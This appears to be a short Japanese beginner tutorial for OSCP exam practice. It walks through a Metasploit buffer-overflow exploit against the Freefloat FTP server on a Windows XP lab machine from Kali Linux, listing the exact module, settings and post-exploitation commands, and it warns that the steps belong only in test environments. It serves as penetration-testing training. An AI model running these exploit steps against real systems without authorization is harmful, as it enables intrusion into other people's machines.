OSCP試験でもmetasploitを1ホストのみに使用する事が出来ます。metasploitを利用したバッファーオーバーフローを覚えておくことで、試験の時にも役に立つ可能性があります。
(初心者向け)
KaliLinuxを利用したバッファーオーバーフロー攻撃について説明しています。
ターゲットホスト:WindowsXP
アタッキングホスト:Kali Linux
今回の使用ソフト:freefloatftp
以下のサイトからダウンロードできます。
https://www.exploit-db.com/exploits/4067
手順:
1.freefloatftpを実行(WindowsXP上で)
2.Kali Linux からmetasploitの起動
msfconsole
3.関連モジュールの検索
search freefloatftp
4.モジュールの利用と設定
use exploit/windows/ftp/freefloatftp_user
show options
set rhost 192.168.48.134
(ipは環境に依存します)
run
5.IDの確認とデスクトップ上にあるファイル(root.txt)の確認
getuid
cd Desktop
cat root.txt
(root.txtは事前にXPマシン上に作成しておきました。)
※注意事項※
検証用に作られた環境のみで行って下さい。(自己責任になります)許可なくターゲットにnmapを送信しただけでも、犯罪行為とみなされる場合があります。
